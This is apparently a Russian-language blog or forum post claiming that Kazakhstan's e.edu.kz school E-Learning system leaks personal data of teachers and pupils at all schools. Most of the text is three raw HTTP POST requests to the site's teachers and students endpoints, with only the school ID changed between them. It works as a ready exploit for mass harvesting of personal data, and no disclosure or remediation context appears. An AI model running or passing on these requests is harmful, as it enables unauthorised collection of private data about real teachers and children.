Уязвимый Казнет и не только
-Персональные данные всех школ РК
Небольшая недоработка программистов системы E-Learning http://e.edu.kz позволяет получить доступ к персональным данным персонала и учащихся всех школ.
POST /nedb-passport/teachers HTTP/1.1
Host: e.edu.kz
Connection: close
Content-Length: 8
Accept: text/html, */*; q=0.01
Origin: https://e.edu.kz
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: **********;
school=1

POST /nedb-passport/teachers HTTP/1.1
Host: e.edu.kz
Connection: close
Content-Length: 8
Accept: text/html, */*; q=0.01
Origin: https://e.edu.kz
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: **********;
school=2

POST /nedb-passport/students HTTP/1.1
Host: e.edu.kz
Connection: close
Content-Length: 8
Accept: text/html, */*; q=0.01
Origin: https://e.edu.kz
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: **********;
school=1
